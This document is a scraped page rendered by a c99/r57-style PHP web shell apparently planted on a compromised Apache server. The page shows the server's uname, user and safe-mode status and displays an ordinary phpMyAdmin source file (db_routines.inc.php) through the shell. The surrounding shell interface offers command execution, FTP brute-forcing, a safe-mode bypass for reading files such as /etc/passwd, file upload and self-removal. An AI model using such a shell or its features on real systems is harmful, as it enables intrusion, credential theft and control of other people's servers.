!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     db_routines.inc.php (4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 *
 * @todo Support seeing the "results" of the called procedure or
 *       function. This needs further reseach because a procedure
 *       does not necessarily contain a SELECT statement that
 *       produces something to see. But it seems we could at least
 *       get the number of rows affected. We would have to
 *       use the CLIENT_MULTI_RESULTS flag to get the result set
 *       and also the call status. All this does not fit well with
 *       our current sql.php.
 *       Of course the interface would need a way to pass calling parameters.
 *       Also, support DEFINER (like we do in export).
 * @package phpMyAdmin
 */
if (! defined('PHPMYADMIN')) {
    exit;
}

$routines PMA_DBI_fetch_result('SELECT SPECIFIC_NAME,ROUTINE_NAME,ROUTINE_TYPE,DTD_IDENTIFIER FROM information_schema.ROUTINES WHERE ROUTINE_SCHEMA= \'' PMA_sqlAddslashes($db,true) . '\';');

if (
$routines) {
    
PMA_generate_slider_effect('routines'__('Routines'));
    echo 
'<fieldset>' "\n";
    echo 
' <legend>' __('Routines') . '</legend>' "\n";
    echo 
'<table border="0">';
    echo 
sprintf('<tr>
                      <th>%s</th>
                      <th>&nbsp;</th>
                      <th>&nbsp;</th>
                      <th>%s</th>
                      <th>%s</th>
                </tr>'
,
          
__('Name'),
          
__('Type'),
          
__('Return type'));
    
$ct=0;
    
$delimiter '//';
    if (
$GLOBALS['cfg']['AjaxEnable']) {
        
$conditional_class 'class="drop_procedure_anchor"';
    } else {
        
$conditional_class '';
    }

    foreach (
$routines as $routine) {

        
// information_schema (at least in MySQL 5.0.45)
        // does not return the routine parameters
        // so we rely on PMA_DBI_get_definition() which
        // uses SHOW CREATE

        
$definition 'DROP ' $routine['ROUTINE_TYPE'] . ' ' PMA_backquote($routine['SPECIFIC_NAME']) . $delimiter "\n"
            
.  PMA_DBI_get_definition($db$routine['ROUTINE_TYPE'], $routine['SPECIFIC_NAME'])
            . 
"\n";

        
//if ($routine['ROUTINE_TYPE'] == 'PROCEDURE') {
        //    $sqlUseProc  = 'CALL ' . $routine['SPECIFIC_NAME'] . '()';
        //} else {
        //    $sqlUseProc = 'SELECT ' . $routine['SPECIFIC_NAME'] . '()';
            /* this won't get us far: to really use the function
               i'd need to know how many parameters the function needs and then create
               something to ask for them. As i don't see this directly in
               the table i am afraid that requires parsing the ROUTINE_DEFINITION
               and i don't really need that now so i simply don't offer
               a method for running the function*/
        //}
        
if ($routine['ROUTINE_TYPE'] == 'PROCEDURE') {
            
$sqlDropProc 'DROP PROCEDURE ' PMA_backquote($routine['SPECIFIC_NAME']);
        } else {
            
$sqlDropProc 'DROP FUNCTION ' PMA_backquote($routine['SPECIFIC_NAME']);
        }

        echo 
sprintf('<tr class="%s">
                          <td><input type="hidden" class="drop_procedure_sql" value="%s" /><strong>%s</strong></td>
                          <td>%s</td>
                          <td>%s</td>
                          <td>%s</td>
                          <td>%s</td>
                     </tr>'
,
                     (
$ct%== 0) ? 'even' 'odd',
                     
$sqlDropProc,
                     
$routine['ROUTINE_NAME'],
                     ! empty(
$definition) ? PMA_linkOrButton('db_sql.php?' $url_query '&amp;sql_query=' urlencode($definition) . '&amp;show_query=1&amp;db_query_force=1&amp;delimiter=' urlencode($delimiter), $titles['Edit']) : '&nbsp;',
                     
'<a ' $conditional_class ' href="sql.php?' $url_query '&amp;sql_query=' urlencode($sqlDropProc) . '" >' $titles['Drop'] . '</a>',
                     
$routine['ROUTINE_TYPE'],
                     
$routine['DTD_IDENTIFIER']);
        
$ct++;
    }
    echo 
'</table>';
    echo 
'</fieldset>' "\n";
    echo 
'</div>' "\n";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0081 ]--